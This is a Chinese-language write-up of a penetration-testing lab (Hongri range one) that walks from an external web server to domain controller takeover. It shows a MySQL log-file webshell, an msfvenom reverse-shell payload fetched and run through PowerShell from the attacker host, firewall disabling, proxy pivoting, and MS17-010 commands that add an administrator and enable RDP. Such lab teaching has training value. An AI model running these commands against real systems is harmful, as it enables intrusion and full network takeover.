红日靶场(一):从外网到域控

admin 2025年4月6日19:43:26评论0 views字数 3006阅读10分1秒阅读模式

本文基于红日靶场(一)的内网渗透演练场景,完整复现攻击者从外网突破到域控接管的完整攻击链条。通过主机发现、端口扫描锁定目标主机,利用Web目录枚举与MySQL弱口令获取数据库权限,并通过日志写入漏洞植入Webshell,进一步通过Meterpreter建立持久会话。随后以内网路由转发与代理穿透技术,结合MS17-010漏洞横向移动至域控及域成员主机,最终通过远程桌面接管整个域环境。

  kali:172.16.8.110
  Web:172.16.8.101、10.10.10.100
  域成员:10.10.10.101
  域控:10.10.10.102

环境探测与信息收集

主机发现

使用nmap对目标网段进行存活主机扫描,确定目标主机IP地址:

nmap -sP 172.16.8.0/24

发现目标主机172.16.8.101,确认其为后续攻击目标。

端口扫描与服务识别

对目标主机进行全端口扫描,识别开放服务及版本信息:

nmap -sV -p- 172.16.8.101

发现服务:

80/tcp:Apache HTTP Server 2.4.23(Windows环境,PHP 5.4.45)

3306/tcp:MySQL服务

Web渗透与初始突破

目录枚举与漏洞发现

通过dirb工具枚举Web目录:

dirb http://172.16.8.101/

发现敏感路径:

http://172.16.8.101/phpmyadmin/
http://172.16.8.101/phpMyAdmin/

phpMyAdmin弱口令利用

尝试使用默认凭据root:root登录phpMyAdmin,成功获取数据库管理权限。

Webshell植入

开启MySQL日志功能

通过SQL命令修改日志路径为Web目录,并写入PHP Webshell:

SET global general_log='on';
SET global general_log_file="C:/phpStudy/WWW/shell.php";
show variables like '%general%';
SELECT 1;/* <?php system($_GET['shell']); ?> */

此时访问http://172.16.8.101/shell.php?shell= 命令即可执行系统命令。

通过Webshell下载并执行Payload

使用Metasploit生成反向TCP Payload:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.8.110 LPORT=8888 -f exe -o shell.exe

启动HTTP服务提供Payload下载:

python -m http.server 80

通过Webshell触发下载与执行:

http://172.16.8.101/shell.php?shell=powershell (new-object System.Net.WebClient).DownloadFile('http://172.16.8.110/shell.exe','shell.exe')

Meterpreter监听

在Metasploit中设置监听模块,获取Meterpreter会话:

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 172.16.8.110
set lport 8888
run

执行shell

http://172.16.8.101/shell.php?shell=.shell.exe

权限维持与内网横向移动

权限维持

通过进程迁移和命令提权至NT AUTHORITYSYSTEM权限。

getsystem
ps
migrate 1156
getpid
getuid

域环境信息收集

关闭防火墙

netsh advfirewall set allprofiles state off

查看网络配置

ipconfig /all

确认域名为god.org,内网网段为10.10.10.0/24

内网主机发现

for /L %I in (1,1,254) DO @ping -w 1 -n 1 10.10.10.%I | findstr "TTL="

通过Ping扫描发现存活主机10.10.10.100、10.10.10.101、10.10.10.102

域控识别

net group "domain admins" /domain
ping owa.god.org

确认域控为owa.god.org(IP: 10.10.10.102)。

内网路由与代理配置

添加内网路由

在Metasploit中添加内网路由

run get_local_subnets
run autoroute -s 10.10.10.0/24
run autoroute -p
background

设置SOCKS代理

设置SOCKS代理(端口8000)穿透内网:

use auxiliary/server/socks_proxy
set SRVPORT 8000
run

配置proxychains4文件

vim /etc/proxychains4.conf

扫描内网主机端口

通过proxychains扫描内网主机端口,发现域控开放SMB服务(445端口)。

proxychains4 nmap -Pn -sT -p 22,80,135,443,445,3389 10.10.10.102

域控与域成员渗透

利用SMB漏洞执行命令

使用Metasploit的ms17_010_command模块攻击域控(IP: 10.10.10.102):

use auxiliary/admin/smb/ms17_010_command
setcommand net user
set RHOST 10.10.10.102
setcommand netsh advfirewall set allprofiles state off
run
setcommand net user hack999 999@Hack /add
run
setcommand net localgroup administrators hack999 /add
run
setcommand'REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'
run

远程桌面连接

通过代理连接域控的远程桌面:

proxychains4 rdesktop 10.10.10.102:3389

使用新建的凭据hack999:999@Hack成功登录域控。

域成员主机渗透

对域成员10.10.10.101重复相同攻击流程:

关闭防火墙

添加用户并提权

开启远程桌面

最终通过proxychains4 rdesktop 10.10.10.101:3389接管域成员主机。

攻击总结

初始入口

通过Web服务的弱口令与日志写入漏洞获取Webshell。

权限维持

利用Metasploit生成Payload建立持久会话。

内网扩展

通过路由和代理穿透内网,结合SMB漏洞横向移动。

域控接管

最终控制域控(owa.god.org)及域成员(ROOT-TVI862UBEH.GOD.org)。

红队全栈教学

可在公众号回复“红队”获取群链接

OSCP+

红日靶场(一):从外网到域控

原文始发于微信公众号(泷羽Sec-Ceo):红日靶场(一):从外网到域控

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年4月6日19:43:26
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   红日靶场(一):从外网到域控https://cn-sec.com/archives/3920065.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息